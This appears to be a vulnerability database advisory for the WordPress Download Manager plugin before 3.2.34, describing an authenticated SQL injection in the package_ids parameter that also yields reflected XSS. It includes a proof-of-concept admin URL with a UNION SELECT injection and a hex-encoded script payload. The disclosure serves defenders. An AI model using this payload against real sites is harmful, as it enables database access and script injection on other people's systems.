WordPress Plugin Vulnerabilities
WordPress Download Manager < 3.2.34 - Authenticated SQL Injection to Reflected XSS
Description
The plugin does not sanitise and escape the package_ids parameter before using it in a SQL statement, leading to a SQL injection, which can also be exploited to cause a Reflected Cross-Site Scripting issue
Proof of Concept
https://example.com/wp-admin/admin.php?page=wpdm-stats&package_ids%5B0%5D=0%29+UNION+SELECT+1%2C0x3c2f6f7074696f6e3e3c2f73656c6563743e3c696d6720737263206f6e6572726f723d616c6572742831293e+--+p
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-01-20 (about 2 years ago)
Added
2022-01-20 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)